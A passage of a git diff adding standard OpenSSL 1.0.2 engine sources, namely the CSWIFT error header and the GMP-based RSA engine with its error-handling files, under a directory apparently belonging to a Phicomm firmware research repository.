+        ERR_unload_strings(CSWIFT_lib_error_code, CSWIFT_str_reasons);
+#endif
+
+#ifdef CSWIFT_LIB_NAME
+        ERR_unload_strings(0, CSWIFT_lib_name);
+#endif
+        CSWIFT_error_init = 1;
+    }
+}
+
+static void ERR_CSWIFT_error(int function, int reason, char *file, int line)
+{
+    if (CSWIFT_lib_error_code == 0)
+        CSWIFT_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(CSWIFT_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift_err.h
new file mode 100644
index 0000000..fde3a82
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift_err.h
@@ -0,0 +1,99 @@
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_CSWIFT_ERR_H
+# define HEADER_CSWIFT_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_CSWIFT_strings(void);
+static void ERR_unload_CSWIFT_strings(void);
+static void ERR_CSWIFT_error(int function, int reason, char *file, int line);
+# define CSWIFTerr(f,r) ERR_CSWIFT_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the CSWIFT functions. */
+
+/* Function codes. */
+# define CSWIFT_F_CSWIFT_CTRL                             100
+# define CSWIFT_F_CSWIFT_DSA_SIGN                         101
+# define CSWIFT_F_CSWIFT_DSA_VERIFY                       102
+# define CSWIFT_F_CSWIFT_FINISH                           103
+# define CSWIFT_F_CSWIFT_INIT                             104
+# define CSWIFT_F_CSWIFT_MOD_EXP                          105
+# define CSWIFT_F_CSWIFT_MOD_EXP_CRT                      106
+# define CSWIFT_F_CSWIFT_RAND_BYTES                       108
+# define CSWIFT_F_CSWIFT_RSA_MOD_EXP                      107
+
+/* Reason codes. */
+# define CSWIFT_R_ALREADY_LOADED                          100
+# define CSWIFT_R_BAD_KEY_SIZE                            101
+# define CSWIFT_R_BN_CTX_FULL                             102
+# define CSWIFT_R_BN_EXPAND_FAIL                          103
+# define CSWIFT_R_CTRL_COMMAND_NOT_IMPLEMENTED            104
+# define CSWIFT_R_MISSING_KEY_COMPONENTS                  105
+# define CSWIFT_R_NOT_LOADED                              106
+# define CSWIFT_R_REQUEST_FAILED                          107
+# define CSWIFT_R_UNIT_FAILURE                            108
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp.c
new file mode 100644
index 0000000..de5f9c0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp.c
@@ -0,0 +1,492 @@
+/* crypto/engine/e_gmp.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2003.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * This engine is not (currently) compiled in by default. Do enable it,
+ * reconfigure OpenSSL with "enable-gmp -lgmp". The GMP libraries and headers
+ * must reside in one of the paths searched by the compiler/linker, otherwise
+ * paths must be specified - eg. try configuring with "enable-gmp
+ * -I<includepath> -L<libpath> -lgmp". YMMV.
+ */
+
+/*-
+ * As for what this does - it's a largely unoptimised implementation of an
+ * ENGINE that uses the GMP library to perform RSA private key operations. To
+ * obtain more information about what "unoptimised" means, see my original mail
+ * on the subject (though ignore the build instructions which have since
+ * changed);
+ *
+ *    http://www.mail-archive.com/openssl-dev@openssl.org/msg12227.html
+ *
+ * On my athlon system at least, it appears the builtin OpenSSL code is now
+ * slightly faster, which is to say that the RSA-related MPI performance
+ * between OpenSSL's BIGNUM and GMP's mpz implementations is probably pretty
+ * balanced for this chip, and so the performance degradation in this ENGINE by
+ * having to convert to/from GMP formats (and not being able to cache
+ * montgomery forms) is probably the difference. However, if some unconfirmed
+ * reports from users is anything to go by, the situation on some other
+ * chipsets might be a good deal more favourable to the GMP version (eg. PPC).
+ * Feedback welcome. */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include <openssl/engine.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#include <openssl/bn.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_GMP
+
+#  include <gmp.h>
+
+#  define E_GMP_LIB_NAME "gmp engine"
+#  include "e_gmp_err.c"
+
+static int e_gmp_destroy(ENGINE *e);
+static int e_gmp_init(ENGINE *e);
+static int e_gmp_finish(ENGINE *e);
+static int e_gmp_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void));
+
+#  ifndef OPENSSL_NO_RSA
+/* RSA stuff */
+static int e_gmp_rsa_mod_exp(BIGNUM *r, const BIGNUM *I, RSA *rsa,
+                             BN_CTX *ctx);
+static int e_gmp_rsa_finish(RSA *r);
+#  endif
+
+/* The definitions for control commands specific to this engine */
+/* #define E_GMP_CMD_SO_PATH            ENGINE_CMD_BASE */
+static const ENGINE_CMD_DEFN e_gmp_cmd_defns[] = {
+#  if 0
+    {E_GMP_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the 'e_gmp' shared library",
+     ENGINE_CMD_FLAG_STRING},
+#  endif
+    {0, NULL, NULL, 0}
+};
+
+#  ifndef OPENSSL_NO_RSA
+/* Our internal RSA_METHOD that we provide pointers to */
+static RSA_METHOD e_gmp_rsa = {
+    "GMP RSA method",
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    e_gmp_rsa_mod_exp,
+    NULL,
+    NULL,
+    e_gmp_rsa_finish,
+    /*
+     * These flags initialise montgomery crud that GMP ignores, however it
+     * makes sure the public key ops (which are done in openssl) don't seem
+     * *slower* than usual :-)
+     */
+    RSA_FLAG_CACHE_PUBLIC | RSA_FLAG_CACHE_PRIVATE,
+    NULL,
+    NULL,
+    NULL
+};
+#  endif
+
+/* Constants used when creating the ENGINE */
+static const char *engine_e_gmp_id = "gmp";
+static const char *engine_e_gmp_name = "GMP engine support";
+
+/*
+ * This internal function is used by ENGINE_gmp() and possibly by the
+ * "dynamic" ENGINE support too
+ */
+static int bind_helper(ENGINE *e)
+{
+#  ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth1;
+#  endif
+    if (!ENGINE_set_id(e, engine_e_gmp_id) ||
+        !ENGINE_set_name(e, engine_e_gmp_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &e_gmp_rsa) ||
+#  endif
+        !ENGINE_set_destroy_function(e, e_gmp_destroy) ||
+        !ENGINE_set_init_function(e, e_gmp_init) ||
+        !ENGINE_set_finish_function(e, e_gmp_finish) ||
+        !ENGINE_set_ctrl_function(e, e_gmp_ctrl) ||
+        !ENGINE_set_cmd_defns(e, e_gmp_cmd_defns))
+        return 0;
+
+#  ifndef OPENSSL_NO_RSA
+    meth1 = RSA_PKCS1_SSLeay();
+    e_gmp_rsa.rsa_pub_enc = meth1->rsa_pub_enc;
+    e_gmp_rsa.rsa_pub_dec = meth1->rsa_pub_dec;
+    e_gmp_rsa.rsa_priv_enc = meth1->rsa_priv_enc;
+    e_gmp_rsa.rsa_priv_dec = meth1->rsa_priv_dec;
+    e_gmp_rsa.bn_mod_exp = meth1->bn_mod_exp;
+#  endif
+
+    /* Ensure the e_gmp error handling is set up */
+    ERR_load_GMP_strings();
+    return 1;
+}
+
+static ENGINE *engine_gmp(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_gmp(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_gmp();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+
+#  ifndef OPENSSL_NO_RSA
+/* Used to attach our own key-data to an RSA structure */
+static int hndidx_rsa = -1;
+#  endif
+
+static int e_gmp_destroy(ENGINE *e)
+{
+    ERR_unload_GMP_strings();
+    return 1;
+}
+
+/* (de)initialisation functions. */
+static int e_gmp_init(ENGINE *e)
+{
+#  ifndef OPENSSL_NO_RSA
+    if (hndidx_rsa == -1)
+        hndidx_rsa = RSA_get_ex_new_index(0,
+                                          "GMP-based RSA key handle",
+                                          NULL, NULL, NULL);
+#  endif
+    if (hndidx_rsa == -1)
+        return 0;
+    return 1;
+}
+
+static int e_gmp_finish(ENGINE *e)
+{
+    return 1;
+}
+
+static int e_gmp_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int to_return = 1;
+
+    switch (cmd) {
+#  if 0
+    case E_GMP_CMD_SO_PATH:
+        /* ... */
+#  endif
+        /* The command isn't understood by this engine */
+    default:
+        GMPerr(GMP_F_E_GMP_CTRL, GMP_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+        to_return = 0;
+        break;
+    }
+
+    return to_return;
+}
+
+/*
+ * Most often limb sizes will be the same. If not, we use hex conversion
+ * which is neat, but extremely inefficient.
+ */
+static int bn2gmp(const BIGNUM *bn, mpz_t g)
+{
+    bn_check_top(bn);
+    if (((sizeof(bn->d[0]) * 8) == GMP_NUMB_BITS) &&
+        (BN_BITS2 == GMP_NUMB_BITS)) {
+        /* The common case */
+        if (!_mpz_realloc(g, bn->top))
+            return 0;
+        memcpy(&g->_mp_d[0], &bn->d[0], bn->top * sizeof(bn->d[0]));
+        g->_mp_size = bn->top;
+        if (bn->neg)
+            g->_mp_size = -g->_mp_size;
+        return 1;
+    } else {
+        int toret;
+        char *tmpchar = BN_bn2hex(bn);
+        if (!tmpchar)
+            return 0;
+        toret = (mpz_set_str(g, tmpchar, 16) == 0 ? 1 : 0);
+        OPENSSL_free(tmpchar);
+        return toret;
+    }
+}
+
+static int gmp2bn(mpz_t g, BIGNUM *bn)
+{
+    if (((sizeof(bn->d[0]) * 8) == GMP_NUMB_BITS) &&
+        (BN_BITS2 == GMP_NUMB_BITS)) {
+        /* The common case */
+        int s = (g->_mp_size >= 0) ? g->_mp_size : -g->_mp_size;
+        BN_zero(bn);
+        if (bn_expand2(bn, s) == NULL)
+            return 0;
+        bn->top = s;
+        memcpy(&bn->d[0], &g->_mp_d[0], s * sizeof(bn->d[0]));
+        bn_correct_top(bn);
+        bn->neg = g->_mp_size >= 0 ? 0 : 1;
+        return 1;
+    } else {
+        int toret;
+        char *tmpchar = OPENSSL_malloc(mpz_sizeinbase(g, 16) + 10);
+        if (!tmpchar)
+            return 0;
+        mpz_get_str(tmpchar, 16, g);
+        toret = BN_hex2bn(&bn, tmpchar);
+        OPENSSL_free(tmpchar);
+        return toret;
+    }
+}
+
+#  ifndef OPENSSL_NO_RSA
+typedef struct st_e_gmp_rsa_ctx {
+    int public_only;
+    mpz_t n;
+    mpz_t d;
+    mpz_t e;
+    mpz_t p;
+    mpz_t q;
+    mpz_t dmp1;
+    mpz_t dmq1;
+    mpz_t iqmp;
+    mpz_t r0, r1, I0, m1;
+} E_GMP_RSA_CTX;
+
+static E_GMP_RSA_CTX *e_gmp_get_rsa(RSA *rsa)
+{
+    E_GMP_RSA_CTX *hptr = RSA_get_ex_data(rsa, hndidx_rsa);
+    if (hptr)
+        return hptr;
+    hptr = OPENSSL_malloc(sizeof(E_GMP_RSA_CTX));
+    if (!hptr)
+        return NULL;
+    /*
+     * These inits could probably be replaced by more intelligent mpz_init2()
+     * versions, to reduce malloc-thrashing.
+     */
+    mpz_init(hptr->n);
+    mpz_init(hptr->d);
+    mpz_init(hptr->e);
+    mpz_init(hptr->p);
+    mpz_init(hptr->q);
+    mpz_init(hptr->dmp1);
+    mpz_init(hptr->dmq1);
+    mpz_init(hptr->iqmp);
+    mpz_init(hptr->r0);
+    mpz_init(hptr->r1);
+    mpz_init(hptr->I0);
+    mpz_init(hptr->m1);
+    if (!bn2gmp(rsa->n, hptr->n) || !bn2gmp(rsa->e, hptr->e))
+        goto err;
+    if (!rsa->p || !rsa->q || !rsa->d || !rsa->dmp1 || !rsa->dmq1
+        || !rsa->iqmp) {
+        hptr->public_only = 1;
+        return hptr;
+    }
+    if (!bn2gmp(rsa->d, hptr->d) || !bn2gmp(rsa->p, hptr->p) ||
+        !bn2gmp(rsa->q, hptr->q) || !bn2gmp(rsa->dmp1, hptr->dmp1) ||
+        !bn2gmp(rsa->dmq1, hptr->dmq1) || !bn2gmp(rsa->iqmp, hptr->iqmp))
+        goto err;
+    hptr->public_only = 0;
+    RSA_set_ex_data(rsa, hndidx_rsa, hptr);
+    return hptr;
+ err:
+    mpz_clear(hptr->n);
+    mpz_clear(hptr->d);
+    mpz_clear(hptr->e);
+    mpz_clear(hptr->p);
+    mpz_clear(hptr->q);
+    mpz_clear(hptr->dmp1);
+    mpz_clear(hptr->dmq1);
+    mpz_clear(hptr->iqmp);
+    mpz_clear(hptr->r0);
+    mpz_clear(hptr->r1);
+    mpz_clear(hptr->I0);
+    mpz_clear(hptr->m1);
+    OPENSSL_free(hptr);
+    return NULL;
+}
+
+static int e_gmp_rsa_finish(RSA *rsa)
+{
+    E_GMP_RSA_CTX *hptr = RSA_get_ex_data(rsa, hndidx_rsa);
+    if (!hptr)
+        return 0;
+    mpz_clear(hptr->n);
+    mpz_clear(hptr->d);
+    mpz_clear(hptr->e);
+    mpz_clear(hptr->p);
+    mpz_clear(hptr->q);
+    mpz_clear(hptr->dmp1);
+    mpz_clear(hptr->dmq1);
+    mpz_clear(hptr->iqmp);
+    mpz_clear(hptr->r0);
+    mpz_clear(hptr->r1);
+    mpz_clear(hptr->I0);
+    mpz_clear(hptr->m1);
+    OPENSSL_free(hptr);
+    RSA_set_ex_data(rsa, hndidx_rsa, NULL);
+    return 1;
+}
+
+static int e_gmp_rsa_mod_exp(BIGNUM *r, const BIGNUM *I, RSA *rsa,
+                             BN_CTX *ctx)
+{
+    E_GMP_RSA_CTX *hptr;
+    int to_return = 0;
+
+    hptr = e_gmp_get_rsa(rsa);
+    if (!hptr) {
+        GMPerr(GMP_F_E_GMP_RSA_MOD_EXP, GMP_R_KEY_CONTEXT_ERROR);
+        return 0;
+    }
+    if (hptr->public_only) {
+        GMPerr(GMP_F_E_GMP_RSA_MOD_EXP, GMP_R_MISSING_KEY_COMPONENTS);
+        return 0;
+    }
+
+    /* ugh!!! */
+    if (!bn2gmp(I, hptr->I0))
+        return 0;
+
+    /*
+     * This is basically the CRT logic in crypto/rsa/rsa_eay.c reworded into
+     * GMP-speak. It may be that GMP's API facilitates cleaner formulations
+     * of this stuff, eg. better handling of negatives, or functions that
+     * combine operations.
+     */
+
+    mpz_mod(hptr->r1, hptr->I0, hptr->q);
+    mpz_powm(hptr->m1, hptr->r1, hptr->dmq1, hptr->q);
+
+    mpz_mod(hptr->r1, hptr->I0, hptr->p);
+    mpz_powm(hptr->r0, hptr->r1, hptr->dmp1, hptr->p);
+
+    mpz_sub(hptr->r0, hptr->r0, hptr->m1);
+
+    if (mpz_sgn(hptr->r0) < 0)
+        mpz_add(hptr->r0, hptr->r0, hptr->p);
+    mpz_mul(hptr->r1, hptr->r0, hptr->iqmp);
+    mpz_mod(hptr->r0, hptr->r1, hptr->p);
+
+    if (mpz_sgn(hptr->r0) < 0)
+        mpz_add(hptr->r0, hptr->r0, hptr->p);
+    mpz_mul(hptr->r1, hptr->r0, hptr->q);
+    mpz_add(hptr->r0, hptr->r1, hptr->m1);
+
+    /* ugh!!! */
+    if (gmp2bn(hptr->r0, r))
+        to_return = 1;
+
+    return 1;
+}
+#  endif
+
+# endif                         /* !OPENSSL_NO_GMP */
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+# ifndef OPENSSL_NO_DYNAMIC_ENGINE
+IMPLEMENT_DYNAMIC_CHECK_FN()
+#  ifndef OPENSSL_NO_GMP
+static int bind_fn(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_e_gmp_id) != 0))
+        return 0;
+    if (!bind_helper(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#  else
+OPENSSL_EXPORT
+    int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns);
+OPENSSL_EXPORT
+    int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns)
+{
+    return 0;
+}
+#  endif
+# endif                         /* !OPENSSL_NO_DYNAMIC_ENGINE */
+
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp.ec
new file mode 100644
index 0000000..72ec447
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp.ec
@@ -0,0 +1 @@
+L GMP		e_gmp_err.h			e_gmp_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp_err.c
new file mode 100644
index 0000000..002a3ab
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp_err.c
@@ -0,0 +1,137 @@
+/* e_gmp_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_gmp_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA GMP_str_functs[] = {
+    {ERR_FUNC(GMP_F_E_GMP_CTRL), "E_GMP_CTRL"},
+    {ERR_FUNC(GMP_F_E_GMP_RSA_MOD_EXP), "E_GMP_RSA_MOD_EXP"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA GMP_str_reasons[] = {
+    {ERR_REASON(GMP_R_CTRL_COMMAND_NOT_IMPLEMENTED),
+     "ctrl command not implemented"},
+    {ERR_REASON(GMP_R_KEY_CONTEXT_ERROR), "key context error"},
+    {ERR_REASON(GMP_R_MISSING_KEY_COMPONENTS), "missing key components"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef GMP_LIB_NAME
+static ERR_STRING_DATA GMP_lib_name[] = {
+    {0, GMP_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int GMP_lib_error_code = 0;
+static int GMP_error_init = 1;
+
+static void ERR_load_GMP_strings(void)
+{
+    if (GMP_lib_error_code == 0)
+        GMP_lib_error_code = ERR_get_next_error_library();
+
+    if (GMP_error_init) {
+        GMP_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(GMP_lib_error_code, GMP_str_functs);
+        ERR_load_strings(GMP_lib_error_code, GMP_str_reasons);
+#endif
+
+#ifdef GMP_LIB_NAME
+        GMP_lib_name->error = ERR_PACK(GMP_lib_error_code, 0, 0);
+        ERR_load_strings(0, GMP_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_GMP_strings(void)
+{
+    if (GMP_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(GMP_lib_error_code, GMP_str_functs);
+        ERR_unload_strings(GMP_lib_error_code, GMP_str_reasons);
+#endif
+
+#ifdef GMP_LIB_NAME
+        ERR_unload_strings(0, GMP_lib_name);
+#endif
+        GMP_error_init = 1;
+    }
+}
+
+static void ERR_GMP_error(int function, int reason, char *file, int line)
+{
+    if (GMP_lib_error_code == 0)
+        GMP_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(GMP_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp_err.h
new file mode 100644
index 0000000..637abbc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_gmp_err.h
@@ -0,0 +1,86 @@
+/* ====================================================================
+ * Copyright (c) 2001-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
